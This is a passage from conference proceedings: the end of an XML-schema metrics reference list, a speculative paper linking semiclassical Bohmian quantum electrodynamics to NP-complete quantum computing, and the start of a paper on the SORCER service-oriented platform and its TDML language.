References 1. Elliot T.A.: Assessing fundamental introductory computing concept knowledge in a language independent manner: A Ph.D. Dissertation, Georgia Institute of Technology, USA (2010) 2. Sotonwa, K.A., Olabiyisi, S.O., Omidiora, E.O.: Comparative analysis of software complexity of searching algorithms using code base metric. Int. J. Sci. Eng. Res. 4(6), 2983–2992 (2014) 3. Sotonwa, K.A., Balogun, M.O., Isola, E.O., Olabiyisi, S.O., Omidiora, E.O., Oyeleye, C.A.: Object oriented programming languages for searching algorithms in software complexity metrics. Int. Res. J. Comput. Sci. 4(6), 2393–9842 (2019) 4. Sotonwa, K.A., Olabiyisi, S.O., Omidiora, E.O., Oyeleye, C.A.: SLOC metric in RNG schema documents. Int. J. Latest Technol. Eng. Manag. Appl. Sci. 8(2), 1–5 (2019) 5. Gavin, B.: What is an XML file, and do I opne one (2018) 6. RoseIndia.Net.: Why XML is used for? (2018) 7. Makoto, M., Dongwon, L., Murali, M.: Taxonomy of XML schema languages using formal language theory, Extreme markup language: XML source via XSL, Saxon and Apache FOP Mulberry Technologies, Inc., pp. 153–166 (2001) 8. Sotonwa, K.A.: Comparative analysis of XML schema languages for improved entropy metric. FUOYE J. Eng. Technol. 5(1), 36–41 (2020) 9. Satish, B.: Introduction to XML part 1: XML Tutorial 10. Bray, T., Jean, P., Sperberg-McQueen, M.C.: Extensible markup language (XML) 1.0 W3C recommendation, (eds) (W3c) (2012). http://www.w3.org/TR/1998/REC-xml-19980210. html 11. Binstock, C., Peterson, D., Smith, M., Wooding, M., Dix, C., Galtenberg, C.: The XML Schema Complete Reference. Addison Wesley Professional Publishing Co. Inc., Boston (2002). ISBN: 0672323745 12. Thompson, H.S., Beech, D., Muzmo, M., Mendel- sohn, N.: XML schema part 1: Structures (eds) W3C recommendation (2004). http://www.w3.org/TR/xmlschema-1/ 13. Makoto, M.: RELAX (regular language description for XML) ISO/IEC DTR 22250-1, Document Description and Processing Languages -- Regular Language Description for XML (RELAX) -- Part 1: RELAX Core (Family Given) (2000) 14. ISO ISO/IEC TR 22250-1:2002 - Information Technology -- Document description and processing languages - Regular Language Description for XML (RELAX) -- Part 1: RELAX Core, First Edition, Technical Committee 36 (2002) 15. Makoto, M., Dongwon, L., Murali, M., Kohsuke, K.: Taxonomy of XML schema languages using formal language theory. ACM Trans. Internet Technol. 5(4), 660–704 (2005) 16. Gill, G.K., Kemerer, C.F.: Cyclomatic complexity density and software maintenance. IEEE Trans. Softw. Eng. 17, 1284–1288 (1991) 17. Sotonwa, K.A., Olabiyisi, S.O., Omidiora, E.O., Oyeleye, C.A.: Development of improved schema entropy and interface complexity metrics. Int. J. Res. Appl. Sci. Eng. Technol. 7(I), 611–621 (2019) 18. Balogun, M.O., Sotonwa, K.A.: A comparative analysis of complexity of C++ and Python programming languages using multi-paradigm complexity metric (MCM). Int. J. Sci. Res. 8(1), 1832–1837 (2019) 19. Harrison, W.K., Magel, R., Kluczny, Dekock, A.: Applying Software Complexity Metrics to Program Maintenance. IEEE Journal Computer Archive Society Press, Los Alamitos (1982) 20. Vu, N., Deeds-Rubin, S., Thomas, T., Boehm, B.: A SLOC counting standard, Center for Systems and Software Engineering University of Southern California (2007) 21. Bhatt, K., Vinit, T., Patel, P.: Analysis of source lines of code (SLOC) metric. Int. J. Emerg. Technol. Adv. Eng. 2(2), 150–154 (2014)
Survey of Schema Languages: On a Software Complexity Metric
361
22. Amit, K.J., Kumar, R.: A new cognitive approach to measure the complexity of software. Int. J. Softw. Eng. Appl. 8(7), 185–198 (2014) 23. http://docbook.sourceforge.net/release/dsssl/current/dtds/ 24. http://java.sun.com/dtd/ 25. http://www.ncbi.nlm.nih.gov/dtd/ 26. http://www.cs.helsinki.fi/group/doremi/publications/XMLSCA2000.Html 27. http://www.w3.org/TR/REC-xml-names/ 28. http://www.omegahat.org/XML/DTDs/ 29. http://www.openmobilealliance.org/Technical/dtd.aspx 30. http://fisheye5.cenqua.com/browse/glassfish/update-center/dtds/ 31. http://www.python.org/topics/xml/dtds/ 32. http://www.okiproject.org/polyphony/docs/raw/dtds/ 33. http://www.w3.org/XML/. Accessed 2008 34. http://ivs.cs.uni-magdeburg.de/sw-eng/us/metclas/index.shtml. Accessed 2008 35. http://www.xml.gr.jp/relax. Accessed 2008 36. http://www.w3.org/TR/2004/REC-xmlschema-1-20041028/. Accessed 2008 37. http://www.w3.org/TR/2001/PR-xmlschema-0-20010330/. Accessed 2008 38. http://www.w3.org/TR/1998/REC-xml-19980210. Accessed 2008 39. http://www.xfront.com/GlobalVersusLocal.html. Accessed 2008 40. http://www.oreillynet.com/xml/blog/2006/05/metrics_for_xml_projects_1_ele.html. Accessed 2008
Bohmian Quantum Field Theory and Quantum Computing F. W. Roush(B) Alabama State University, Montgomery, AL 36101-0271, USA [email protected] Abstract. Abrams and Lloyd proved that if quantum mechanics has a small nonlinear component then theoretical quantum computers would be able to solve NP-complete problems. We show that a semiclassical theory of electrodynamics in which the fermions are quantized but the electromagnetic field is not, and in which the particles and the field interact in a natural way, does have such a nonlinear component. We argue that in many situations this semiclassical theory will be a close approximation to quantum field theory. In a more speculative argument, we discuss the possibility that the apparent quantization of the electromagnetic field could be a result of (1) quantization of interactions of the electromagnetic field with matter and (2) wave packets, regions within the electromagnetic field that are approximate photons. At the least this gives a theory which, if crude, avoids the major divergences of standard quantum field theory. We suggest how this might be extended to a quantum theory of the other three forces by modifying the Standard Model and using a model of gravity equivalent to spin 2 gravitons. This also provides a quantum field theory that agrees with Bohmian ideas. Keywords: Quantum computing · NP-complete · Semiclassical field theory · Bohmian mechanics · Unified field theory
1
Introduction
Standard quantum mechanics is a theory that can predict motions of particles that are also waves. It can do this by computing the wave equation, which is a standard linear partial differential equation, odinger equation, like the √ the Schr¨ heat equation except for a factor i = −1, to get solutions which are wave functions ψ. Then |ψ|2 gives the probability density function for positions of particles such as a system of electrons. There are also alternative formulations of quantum mechanics due to Heisenberg, Dirac, and Feynman, which use matrices or path integrals to derive versions of ψ. The motion of electrons around nuclei is quantized in terms of operators occuring in the Schr¨ odinger equation which represent energy. Angular momentum is also quantized. The allowed energy levels are the eigenvalues of these operators, and radiation occurs when a particle jumps from one state to the other, whose magnitude is the difference of the energy levels in the two states. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 362–371, 2023. https://doi.org/10.1007/978-3-031-28073-3_26
Bohmian Quantum Field Theory and Quantum Computing
363
As will be mentioned later, Planck’s law E = hν relating energy E, frequency h k relating momentum p ν, and Planck’s constant h as well as the law p = 2π and wave number k, are satisfied. Essentially all of chemistry is an application of quantum mechanics. Essentially all of chemistry is an application of quantum mechanics. Quantum mechanics deals with a system of a given number of particles of matter, called fermions, such as protons and electrons, and their interactions. Quantum field theory is a refinement of quantum mechanics which includes fields as well as matter particles. The fields are considered as quantified into particles called bosons, such as photons. There are many notorious mathematical difficulties with quantum field theory, such as divergent series and infinite masses and operators that don’t lie in Hilbert spaces, but where calculations have been possible, it agrees with experiment to high accuracy. Here we focus on a theory which is intermediate between the two, and can be called semiclassical. The interaction of matter particles and fields is considered; only the matter particles are fundamentally quantized, though the fields inherit some quantum properties from the fermions. Almost none of the ideas presented here is new, but possibly the combination of ideas is new. A motivation for this method is the desire to see whether a more powerful quantum computer could be built using effects from general quantum field theory and not just quantum mechanics and a separate theory of photons. This is difficult using the standard perturbative methods because so many computations diverge (in fact even the perturbative series of quantum electrodynamics diverge in all nontrivial cases). There is no good theory of the quantum vacuum and this is important because the zero-point energy of the vacuum, which seems theoretically to be infinite, can affect real experiments. Even if the model presented next is a gross oversimplification, it might still allow computations to be made which are approximately correct. The primary goal of this paper is to bring the goal of a quantum computer that could solve NP-complete problems a little closer by proposing a nonlinear quantum dynamics that is consistent with the theorem of Abrams and Lloyd that such computers would exist provided that quantum mechanics has a small nonlinear component. The particular mechanics involved is a model of quantum electrodynamics that is first quantized but not second quantized. In many situations this will closely approximate the results from a second quantized model, and it is in some respects a lot easier to work with. A second goal is to discuss the question whether this model might actually be a correct theory of quantum electrodynamics. This requires a discussion of what photons are. This and the final part is speculative. A final goal is to indicate how this might be extended to other forces for a unified field theory. This theory fits well with Bohmian ideas, but does not require them.
364
2
F. W. Roush
The Abrams-Lloyd Theorem
It was proved by Abrams and Lloyd [1] that if quantum mechanics has a small nonlinear component, then quantum computers could solve NP-complete problems in polynomial time. Abrams and Lloyd give two constructions, of which the first is more general and the second more fault-tolerant. By the Valiant-Vazirani theorem [8] it is enough to work with the case in which an NP problem has at most 1 solution. We might take a problem of the form f (v) = 1 where f is a Boolean function of n binary inputs. By the construction for Forrelation, a standard quantum computer can obtain a unit vector of size N = 2n , where 1 there are n qubits for this vector, such that the entries of the vector are ± 2n/2 and where the sign of the K entry in binary notation is (−1)f (v) . This can then be transformed to a fairly arbitrary unit vector by quantum operations. Then Abrams and Lloyd use the result that almost any nonlinear dynamical system given by a transformation f on a state space V will have exponential sensitivity to initial conditions, a positive Lyapunov exponent, so that iterates f n will magnify distances exponentially as n increases. The distance between a vector for 1 solution and the vector for no solutions is exponentially small, but these iterates will magnify the difference until a quantum computer can measure it. The second algorithm of Abrams and Lloyd involves applying a gate to pairs of coordinates, so that if both are positive the results are stable, but if one is negative then the results become measurably smaller. We first use pairs differing by 2 then by 4, and so on, equivalently working with different qubits. This will produce a relatively significant difference in a significant fraction of all entries, and again, this can be measured. If there is good relative accuracy for the individual operations, then the result will be accurate.
3
Lagrangians and Yang-Mills Fields
In classical fields, the Lagrangian is the difference L = T − V of kinetic and potential energy. The least action principle, which is equivalent to Newton’s laws for conservative forces, says that the action S, the time integral of the Lagrangian, is the minimum or at least a critical point, for the actual trajectory of an object, as compared with other possible paths. This will also be true in the theory here. The Euler formula for maximizing or minimizing a definite integral b F (t, f, f )dt over functions f (t) with given values at the endpoints, f (t) = a df dt is d ∂ ∂ F− F. 0= ∂f dt ∂f The Euler formula can be extended to more variables and higher derivatives in a natural way, and constraints can be incorporated with Lagrange multipliers. 2 For example, in a flat space with no forces, V = 0, T = mv 2 , and the least action principle says particles will move in a straight line with constant velocity.
Bohmian Quantum Field Theory and Quantum Computing
365
The theories of general fields, such as the color field which affects quarks, is often stated in terms of Lagrangians, but using other principles. Schwinger and Tomonaga used a modified variational principle. This is δB|A = iB|δS|A where |A and |B are early and late states of a quantum system and S is action and δ is functional derivative (as in Euler’s equation above). Feynman used the principle that the integral of an exponentiated Laplacian e2iLπ/h over all paths determines the transition matrix between the wave function at one point of space-time and the wave function at another. Path integrals involve some mathematical difficulties but can be approximated by breaking them into polygonal segments and using a Gaussian probability distribution. This principle applies to fields as well as particles. In the process we need to sum over all possibilities for interactions of particles such as absorption or emissions of photons from electrons. Yang-Mills theory associates a Lagrangian formula with a continuous group G. It is the way in which the force laws for the strong and weak forces are most conveniently derived and related to electromagnetism in the Standard Model of forces other than gravity. The equations can be specified in terms of the Lie algebra of G, which specifies the infinitesimal multiplication, or in terms of the curvature of a connection, more theoretically. The electromagnetic, weak, and strong forces correspond respectively to the groups U (1), SU (2), SU (3) of complex matrices of sizes 1×1, 2×2, 3×3 which preserve the lengths of vectors in terms of complex absolute values, and in the latter two cases have determinant 1. Interactions between forces can be specified in a similar way.
A Nonlinear Semiclassical Quantum Electrodynamics We first note that typically, nonlinear physical dynamical systems can be viewed as unitary systems on some huge space, namely usually some measure will be preserved. Then there will be a space of all measurable, square integrable functions on this space, L2 , and the dynamics of this function space will be linear and unitary. This is a little like passing to a second quantization. But if the original nonlinear theory is large enough to do quantum mechanics with it, that is, there are Sch¨ odinger or Dirac equations and particle wave functions tensor as we include more particles, then that system is large enough for nonlinear quantum computers. In the simplest sense, any model for electrodynamics that includes both fields and particles and some kind of interaction between the day will include some version of the equation for the force on a charged particle in a magnetic field F = qv × B where F is force, q is charge, v is the velocity of the particle, and B is magnetic field.
366
F. W. Roush
This equation is nonlinear when the particle motion affects the magnetic field. However we consider a more exact system in the case of one particle, which can be viewed as the standard system of electrodynamics after first quantization but before second quantization [9] (this is for one particle): 1 SQED = dx4 [− F μν Fμν + ψ(iγ μ Dμ − m)ψ] 4 Here S is action, x is space-time, F is the electromagnetic field tensor, ψ is the Dirac wave function, ψ is the conjugate transpose ψ † γ 0 , the γ are the Dirac matrices (given constants), the μ, ν are space-time indices in tensor notation, m is mass and D is the covariant derivative Dμ = ∂μ + ieAμ + ieBμ where A is electromagnetic potential, B is an external potential, and e is charge or coupling constant. When it is standard, the physics notation ∂μ = ∂x∂ µ will be used. This system is intrinsically nonlinear. Below we will consider only one electromagnetic field. The equations of motion in this system can be given by applying the EulerLagrange equations of the calculus of variations to obtain critical points of the action. To be more specific in [9], the equation of motion of ψ is (iγ μ ∂μ − m)ψ = eγ μ Aμ ψ that is, this gives the time rate of change of ψ in a frame of reference. The equation of motion for the field A can be reduced Aμ = ej μ for a current j by using the Lorenz gauge condition and this is a natural form of Maxwell’s equations. The standard form of Dirac’s equation [10] for two fermions (with an additional scalar field S) is, for i=1,2 indexing the two particles, [(γi )μ (pi − Ai )μ + mi + Si ]ψ = 0 where ψ is now a 16-component function of the positions of both fermions, and pμ = −i
∂ . ∂xμ
This agrees with the expression above, and Maxwell’s equations give an equation of motion for the field. These equations can be extended in a natural way to n particles. Here too there will be only one electromagnetic field A in our situation. This system will reflect interactions of fermions and photons, viewed as part of an electromagnetic field, fairly well, though it does ignore annihilation of fermions and their antiparticles, which is rarer. The approximation should be good enough that it should also be valid for a second-quantized electrodynamics to the extent calculations can be done in it, because it agrees with the individual interaction histories represented by Feynman diagrams. To expand on this, we next discuss photons.
Bohmian Quantum Field Theory and Quantum Computing
4
367
Fields and Photons
At the beginnings of quantum theory it was considered that possibly particles but not fields were quantized, and this seems to have been David Bohm’s view. Before quantum mechanics was well-developed, methods did not exist that could realize this idea. If we use a (possibly less accurate and cruder) model in which the electromagnetic field is not quantized, then there must be a way to account for the effects which are accounted for by photons in the standard theory. One way to account for them is to say that the quantization of fermion systems means that also interactions between fermions and force fields are quantized. That is, photons are typically observed as the result of absorption by matter. This occurs when electrons in matter are raised to a higher energy state. For the natural frequencies involve, this will agree with Planck’s law E = hν: that is a consequence of the Schr¨ odinger equation in the form ih ∂ ψ = Hψ 2π ∂t when we search for solutions of the form exp(iωt)ψ1 (x) using a separation of variables. So the interaction is quantized even if the field does not actually consist of photons; the effects of photons are still present. An actual existence of photons in itself leads to strange conclusions: if the frequency and momentum are fixed then photons have a trigonometric form which suggest that they extend through all time and space. This would also be true for free electrons, but it is more natural to consider electrons as bound but photons as free until they interact with matter. In our model we will assume that approximate photons do exist as wave packets within the electromagnetic field, that is these exist mostly in bounded regions of space and within those regions frequency and wavelength are approximately constant. These packets will spread as they travel, but perhaps no more than pulses from a laser. It would be somewhat natural to take the electromagnetic field for photons as the analogue of the probability wave field for electrons, in that they both can explain slit experiments and diffraction. The analogy must be made a little more complicated when it is to deal with more than one photon with different polarizations, which in the standard theory is a symmetrization of a tensor product. In order to fit this within a single electromagnetic field we will assume that the approximate photons are somewhat spatially separated portions of a single electromagnetic field. Otherwise we would need to allow some linear dependence among combinations of polarized photons.
5
Quantum Logic Gates
We do not have a definite proposal for a nonlinear quantum logic gate to be added to a standard set of linear quantum gates. The construction of linear quantum gates varies widely with the type of quantum effect used for qubits.
368
F. W. Roush
Trapped ion qubits are the current favorites. A quadruple trap is constructed using an oscillating electric field at radio frequencies. This can use the Cirac Zoller controlled-Not gate [11] The interaction of 2 qubits is mediated by an entire chain of qubits. This involves a specific sequence of 3 pulses. The qubits must be coupled. In the Loss-Vicenzo quantum dot computer [12] the 1/2 spin of electrons confined in quantum dots are used as qubits. Gates are by swap operations and rotations, with local magnetic fields. A pulsed inter-dot gate voltage is used so that there is a constant in the Hamiltonian which becomes time-dependent. A square root of a corresponding matrix gives the exchange. Kane’s quantum computer [13] involves a combination of nuclear magnetic resonance and electron spin; it passes from nuclear spin to electron spin. An alternating magnetic field allows the qubits to be manipulated. We alter the voltage on the metal A gates, which are metal attachments on top of an insulating silicon layer. This alters a resonant frequency and allows phosphorus donors within silicon to be dealt with individually. A potential on a J gate between two a gates draws donor electrons together and allows interactions of qubits. Electron-on-helium qubits [14] uses a binding of electrons to the surface of liquid helium. The electron is outside the helium and has a series of energy levels like the Rydberg series. Qubit operations are done by microwave fields exciting the Rydberg transition. The Coulomb interaction facilitates qubit interactions. There might be exchange interaction of adjacent qubits, but it is not clear if this is enough for powerful quantum interactions. Topological quantum computers based on quantum surface effects on special materials like topological insulators might have the gates described in [6], which are a little complicated. It might be said that a nonlinear gate will have to involve quantum field effects beyond those from quantum mechanics, and those effects cannot become too small as we work with a number of qubits. If particles are to have fairly high velocities and not leave the system, it is more convenient for their motion to be oscillatory or to travel a closed loop. It is also reasonable that it might use existing ideas from the above linear gates.
6
Bohmian Mechanics
At this point we go even further into the realm of speculation, and the reader who does not enjoy this might prefer to stop here. The remainder is not presently relevant to quantum computing. The interpretation of quantum mechanics is often considered a matter of personal taste, and there is no unanimity on such an interpretation. In the past the Copenhagen interpretation was dominant at one time, and the Evereet many worlds or multiverse interpretation is rather popular now. The interpretation by David Bohm grew out of ideas of Louis de Broglie that a fermion is not either a wave or a particle but a pair, a wave and a particle, where the wave is the usual probability wave and the particle can travel
Bohmian Quantum Field Theory and Quantum Computing
369
faster than light, but only in a way which is unobservable and cannot transmit information, and the particle is guided by the wave. Special assumptions are needed to reconcile this with special relativity in terms of what can be observed. The most natural way to do this seems to be to assume there is a particular but physically unobservable space-time frame, and compute in it, but then transform the results if different frames are used. Workers in Bohmian mechanics, Durr et al. [4], [5], Dewdney and Horton [3], and Nikoliˇc [7] have come up with versions which are consistent with special relativity. This is done in something like two methods: either we specify a timelike vector field, as Durr does, or we say that each particle in a multiparticle system can have its individual time coordinate. It is more reasonable philosophically however if we make an assumption which is not generally allowed in modern physics, that is, that there is a hidden special coordinate frame for space-time. This might be considered as a way of breaking Lorentz symmetry. Siddhant Das and Markus N¨ oth [2], building on previous work with Detlef Durr, have studied experiments that might distinguish Bohmian mechanics from other interpretations of quantum mechanics.
7
A System of Equations
The mathematical formulation of the theory here is that it consists of five equation systems: (1) a version of the Dirac equation for systems involving any finite number of fermions and a given set of fields, which is the natural generalization of the system considered above (2) the main equation of Bohmian mechanics h dxi = ∇i (Im(ln(ψ))) dt 2πmi (3) Maxwell’s equations of the electromagnetic field (4) a way to account for creation and annihilation of fermion-anti-fermion pairs (5) a way to obtain the electromagnetic field, which is, specifically, the same equations as for (1) in the semiclassical model. The 4th is a comparatively rare event. We propose that it is represented by a singularity in which the energy of the electromagnetic field increases by the amount lost when the fermion and anti-fermion are destroyed. This affects the Dirac equation by changing the number of particles and hence the dimensionality of the space on which ψ is defined. We must thus transform ψ when this event happens. This can be done by projecting ψ to the lowerdimensional space. If we consider an analogous case of a Schr¨ odinger equation and given electric fields which for each particle depend on its position, we can image that a solution is a limit of sums or linear combinations of products of functions which solve the equation for each of the separate particles, then the projection on each term replaces the functions for the deleted particles by 1. It can be seen that a linear combination of functions solving the equation for separate particles will satisfy the total equation, by the multiplicative property of the time derivative, and the Laplacians and potential multiples affecting each only a single factor. For particle-antiparticle creation, we time-reverse the equations for
370
F. W. Roush
creation. This requires a theory in which singularities can be determined from the nonsingular points of a solution. Real-analytic functions, for instance, have this property. As previously mentioned, for (5) we can use a form of the freespace Maxwell equations. To this could be added a specification of the nature of the singularity of the field that would occur for a point particle such as an electron. This is similar to what can be done for Newtonian gravity by saying that the field is a free field with singularities which are first-order poles at the particles. Nikoliˇc has observed that Bohmian theory might give an explanation of the success of otherwise mysterious string theory and its huge number of variables. Strings are approximations to Bohmian orbits. However closed strings are usually thought of as smaller than closed orbits in Bohmian theory. In the Standard Model all the fields, such as the gluon field, have a classical version as well as a quantum version, because they are described in terms of Lagrangians. These can be added to the model at the beginning of this section, with these fields and with the particles of the Standard Model. Durr [5] has produced a Bohmian model of quantum gravity involving curved space. One can also consider quantum gravity in terms of gravitons. It is known that a hypothetical theory mediated by spin 2 gravitons must coincide essentially with general relativity as a non-quantum theory, regardless of the way the gravitons interact. The problem is that this theory is not renormalizable. This is not a problem for the theory of the previous section, which does not require renormalization. However if we can produce a formal Lagrangian, then we might alternatively produce a classical gravity field in this way.
8
Conclusion
A semiclassical field theory is nonlinear and appears to be a suitable setting in which the Abrams-Lloyd Theorem would provide a theoretical quantum computer that could solve NP-complete problems fairly directly. The question of specific nonlinear quantum logic gates is left for the future. It seems possible that this semiclassical theory is not just an approximation but is an accurate model of fields which avoids convergence problems. Moreover this semiclassical theory extends to a unified theory of all four forces, which is also compatible with Bohmian ideas.
References 1. Abrams, D.S., Lloyd[6], S.: Nonlinear quantum mechanics implies polynomial-time solution for NP-complete and # P problems. arxiv:quant-phy/9801041 2. Das, S., N¨ oth, M.: Times of arrival and gauge invariance. arxiv:quant-ph/2102.02661 3. Dewdney, C., Horton, G.: Relatively invariant extension of the de Broglie-Bohm theory of quantum mechanics. arxiv: quant-ph/0202104 4. Durr, D., Goldstein, S., Norsen, T., Struyve, W., Zhangh`ı, N.: Can Bohmian mechanics be made relativistic. arxiv: quant-phy/1307.1714
Bohmian Quantum Field Theory and Quantum Computing
371
5. Durr, D., Struyve, W.: Quantum Einstein equations. arxiv:quant-phy/2003.03839 6. Bonderson, P., Das Sarma, S., Freedman, M., Nayak, C.: A blueprint for a topologically fault-tolerant quantum computer. arxiv:math/1003.2856 7. Nikoliˇc, H.: Relativistic quantum mechanics and quantum field theory. arxiv:quant-phy/1203.1139 8. Valiant, L., Vazirani, V.: NP is as easy as detecting unique solutions. Theoret. Comput. Sci. 47, 85–93 (1986) 9. Wikipedia article, Quantum Electrodynamics. https://en.wikipedia.org/wiki/ Quantum electrodynamics 10. Wikipedia article, Two-body Dirac equations. https://en.wikipedia.org/wiki/Twobody Dirac equations 11. Wikipedia article, Trapped ion quantum computer. https://en.wikipedia.org/wiki/ Trapped ion quantum computer 12. Wikipedia article, Spin qubit quantum computer. https://en.wikipedia.org/wiki/ Spin qubit quantum computer 13. Wikipedia article, Kane quantum computer. https://en.wikipedia.org/wiki/Kane quantum computer 14. Wikipedia article, Electron-on-helium qubit. https://en.wikipedia.org/wiki/ Electron-on-helium qubit
Service-Oriented Multidisciplinary Computing: From Code Providers to Transdisciplines Michael Sobolewski1,2(B) 1 Air Force Research Laboratory, WPAFB, Dayton, OH 45433, USA
[email protected] 2 Polish Japanese Academy of IT, 02-008 Warsaw, Poland
Abstract. True service-oriented architecture provides a set of guidelines and the semantically relevant language for expressing and realizing combined request services by a netcentric platform. The transdisciplinary Modeling Langue (TDML) is an executable language in the SORCER platform based on service abstraction (everything is a service) and three pillars of service-orientation: contextion (context awareness), multifidelity, and multityping of code providers in the network. TDML allows for defining complex polymorphic disciplines of disciplines (transdisciplines) as service that can express, reconfigure, and morph large distributed multidisciplinary processes at runtime. In this paper the approach applicable to complex multidisciplinary systems is presented with five types of nested service aggregations into distributed transdisciplines. Keywords: True service orientation · Contextion · Multifidelities · Multityping · Transdisciplines · Emergent systems · SORCER
1 Introduction Service-oriented architecture (SOA) emerged as an approach to combat complexity and challenges of large monolithic applications by offering cooperations of replaceable functionalities by remote/local component services with one another at runtime, as long as the semantics of the component service is the same. However, despite many efforts, there is a lack of good consensus on netcentric semantics of a service and how to do true SOA well. The true SOA architecture should provide the clear answer to the question: How a service consumer can consume and combine some functionality from service providers, while it doesn’t know where those providers are or even how to communicate with them? In TDML service-oriented modeling - three types of services are distinguished: operation services, and two types of request services: elementary and combined. An operation service, in short opservice, invokes an operation of its code provider. TDML opservices never communicate directly to service providers in the network. An elementary request service asks an opservice for output data given input data. A combined request service specifies cooperation of hierarchically organized multiple request services that in turn © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 372–384, 2023. https://doi.org/10.1007/978-3-031-28073-3_27
Service-Oriented Multidisciplinary Computing
373
execute operation services. Therefore, a service consumer utilizes output results of multiple executed request and operation services. The end user that creates request services and utilizes the created service partnership of code providers becomes the coproducer and the consumer. Software developers develop code providers provisioned in the network, but the end users relying on code providers develop combined services by reflecting their experiences, creativity, and innovation. Such coproduction is the source of innovation and competitive advantage. The Service-ORiented Computing EnviRonment (SORCER) [6–10] adheres to the true SO architecture based on formalized service abstractions and the three pillars of SO programming. Evolution of the presented approach started with the FIPER project [5] funded by NIST ($21.5 million) at the beginning of this millennium then continued at the SORCER/TTU Laboratory [9] and maturing for real world aerospace applications at the Multidisciplinary Science and Technology Center, AFRL/WPAFB [1–3]. The mathematical approach for the SORCER platform is presented in [7, 8]. In this paper the focus is on a transdisciplinary programming environment for SORCER.
2 Disciplines and Intents in TDML A discipline is considered as a system of rules governing computation in a particular field of study. Multidisciplinary science is the science of multidisciplinary process expression. A discipline considered as a system of multiple cooperating disciplines is called a transdiscipline. A transdisciplinary process is a systemic form of multidisciplinary processes. The Transdisciplinary Modeling Language (TDML) is attentive on transdisciplinary process expression and execution of transdisciplines as disciplines of disciplines. In mathematical terminology, if a discipline is a function, then transdiscipline is a functional (higher-order function). An intent is a service context of requestor, but a transdisciplinary intent is a context of contexts that specifies relationships between disciplinary contexts of the transdiscipline and related parts so that a change to one propagates intended data and control flow to others. It is a kind of ontology that represents the ideas, concepts, and criteria defined by the designer to be important for expressing and executing the multidisciplinary process. It should express both functional and technical needs of the multidisciplinary process. The transdisciplinary approach is service-oriented, it means that functionality is what a service provider does or is used for, while a service is an act of serving in which a service requestor takes the responsibility that something desirable happens on the behalf of other services represented by service requestors or service providers. Thus, a discipline represents a service provider while a discipline intent represents a discipline requestor. Service-orientation implies that everything is a service to a large extent, thus both requestors and providers represent services. Disciplines of disciplines and their parts form hierarchically organized service cooperations at runtime. Service cooperation partitions workloads between collaborating request and provider services. At the bottom of the cooperative service hierarchy code providers make local and/or remote calls to run executable codes of domain-specific applications, tools, and utilities (ATUs).
374
M. Sobolewski
2.1 The Service-Oriented Conceptualization of TDML A code provider corresponds to actualization of an opservice. A single opservice repreents elementary request service, but a combined request service is actualized by a cooperation of code providers. Therefore, a combined request service may represent a process expression realized by cooperation of many request services and finally corresponding execution of code providers in the network. In TDML, combined services express hierarchically organized disciplinary dependencies. Transdisciplines are combined services at various levels of granularity. Granularity refers to the extent to which a larger discipline is subdivided into smaller distinguishable disciplines. Cohesion of a discipline is a measure of the strength of relationship between dependences of the discipline. High cohesion of disciplines often correlates with loose coupling, and vice versa. Operational services (opservices) represent the lowest service granularity and refer to executable codes of functions, procedures, and methods of local/remote objects. The design principle for aggregating all input/output data into service contexts and using contexts by all cooperating services working in unison is called service context awareness. Service context awareness, also called data contextion, is a form of parametric polymorphism. A contextion is a mapping from input service context to output service context. Using service contexts, a contextion can be expressed generically so that it can handle values generically without depending on individual argument types. Request services as contextions are generic services that form the core of SO programming [8]. Service disciplines are aggregations of contextions as illustrated in Fig. 1. A service domain is either a routine (imperative domain) or model (declarative domain), or aggregation of both. Domain aggregations are called transdomains. They provide for declarative/imperative transitions of domains within a transdomain. Transroutine and Transmodel contextions are subtypes of the Transdomain type. The service oriented TDML semantics (from code providers to transdisciplines) and relationships between service types are illustrated in Fig. 1. Combined disciplinary request services at the bottom of their service hierarchy are actualized by executable codes of code providers. A workload of a code provider is expressed by a service signature, sig(op, tp), where an operation op of tp has to be executed by a code provider of type tp. A code provider may implement multiple service types each with multiple operations. Therefore, a signature type can be generalized to a multitype that serves as a classifier of service providers in the network. A multitype signature sig(op, tp1 , tp2 ,..., tpn ) is an association of a service operation op of tp1 and a multitype in the form of the list of service types tp1 , tp2 ,..., tpn to be implemented by a service provider. The operation op is specified by the first service type in the list of service types. If all service types of a signature are interface types, then such signature is called remote. If the first type is a class type, then a signature is called local. Note that binding remote signatures to code providers in the network is dynamic, specified only by service types (interfaces considered as service contracts) to be implemented by the code provider. Service signatures used in request services are free variables to be bound at runtime to redundant instances of code providers available or provisionable in the network. To provision a code provider in the network, the signature needs to declare a deployment configuration as follows:
Service-Oriented Multidisciplinary Computing
375
sig(op, tp, deploy(config("myCfg"), idle("1h")))
where myCfg is a configuration file and idle specifies that after one hour of idle tine the code provider should be deprovisioned. Provisioning od code providers in SORCER is supported by Rio technology [12]. In the case of instantiation with local signatures, the instances of a given code provider type are constructed at runtime. Therefore, service signatures provide the unform representation for instantiation of local, remote, and on-demand provisioned code providers. Service signature are fundamental enablers of true service orientation in TDML and SORCER [8]. Opservices (evaluators and signatures in TDML) are bound to code providers (ATUs) at runtime. They are used by elementary services (entries and tasks) to create the executable foundation for all combined request services. Service entries are elementary services that represent functionals (higher-order functions), procedures (first-order functions), system calls via corresponding opservices. Service tasks use service signatures predominantly to represent net-centric local/remote object-oriented invocations. A signature binds to a code provider but doesn’t know where the provider is or even how to communicate with - the basic principle of net-centricity in TDML implemented with the Jini technology [11].
Fig. 1. TDML Service-Oriented Conceptualization: From Code Providers (Actualization) to Consumers of Multidisciplinary Services Realized by Service Requestors
2.2 Three Pillars of Service Orientation The presented service semantics of service orientation can be to summarize the three SO pillars (see Fig. 1 indicated in the red color) as follows: 1. Contextion allows for a service to be specified generically, so it can handle context data uniformly with required data types of context entries to be consistent with
376
M. Sobolewski
